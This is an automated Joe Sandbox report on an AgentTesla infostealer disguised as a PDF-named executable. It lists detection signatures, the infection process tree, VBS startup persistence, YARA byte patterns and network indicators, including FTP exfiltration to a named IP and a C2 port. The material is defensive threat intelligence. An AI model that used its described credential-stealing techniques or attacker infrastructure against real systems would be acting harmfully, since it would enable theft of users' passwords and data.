Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INDIA - VSL PARTICULARS.pdf.exe

Overview

General Information

Sample name:INDIA - VSL PARTICULARS.pdf.exe
Analysis ID:1519011
MD5:6f780b2d3c14a3c9bb7c99c818421ea1
SHA1:a125c2a8cd2f4d4fbda4429bdae54e85eec396a2
SHA256:c7183b75ac8f638031abbb6bb3edd5223c626483d5cc82e6b30ae049de038a00
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INDIA - VSL PARTICULARS.pdf.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
    • name.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
      • RegSvcs.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6040 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
      • RegSvcs.exe (PID: 2020 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • name.exe (PID: 5196 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
        • RegSvcs.exe (PID: 5172 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • name.exe (PID: 2872 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
          • RegSvcs.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    8.2.name.exe.1690000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    2.2.name.exe.2b70000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    6.2.name.exe.37b0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious Double Extension File Execution
    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe", CommandLine: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, NewProcessName: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, OriginalFileName: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe", ProcessId: 5932, ProcessName: INDIA - VSL PARTICULARS.pdf.exe
    Sigma detected: WScript or CScript Dropper
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6040, ProcessName: wscript.exe
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6040, ProcessName: wscript.exe

    Data Obfuscation

    barindex
    Sigma detected: Drops script at startup location
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 5392, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T05:34:32.803495+020020299271A Network Trojan was detected192.168.2.64971950.87.144.15721TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T05:34:33.314890+020028555421A Network Trojan was detected192.168.2.64972050.87.144.15735284TCP
    2024-09-26T05:34:33.321440+020028555421A Network Trojan was detected192.168.2.64972050.87.144.15735284TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: INDIA - VSL PARTICULARS.pdf.exeAvira: detected
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Local\directory\name.exeAvira: detection malicious, Label: HEUR/AGEN.1321671
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\directory\name.exeReversingLabs: Detection: 34%
    Multi AV Scanner detection for submitted file
    Source: INDIA - VSL PARTICULARS.pdf.exeVirustotal: Detection: 27%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: INDIA - VSL PARTICULARS.pdf.exeJoe Sandbox ML: detected
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00452492
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00442886
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_004788BD
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,6_2_004339B6
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,6_2_0045CAFA
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00431A86
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,6_2_0044BD27
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045DE8F FindFirstFileW,FindClose,6_2_0045DE8F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0044BF8B
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49720 -> 50.87.144.157:35284
    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49719 -> 50.87.144.157:21
    Source: global trafficTCP traffic: 192.168.2.6:49720 -> 50.87.144.157:35284
    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
    Source: Joe Sandbox ViewIP Address: 50.87.144.157 50.87.144.157
    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownDNS query: name: api.ipify.org
    Source: unknownDNS query: name: api.ipify.org
    Source: unknownFTP traffic detected: 50.87.144.157:21 -> 192.168.2.6:49719 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:34. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
    Source: global trafficDNS traffic detected: DNS query: beirutrest.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0045A10F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
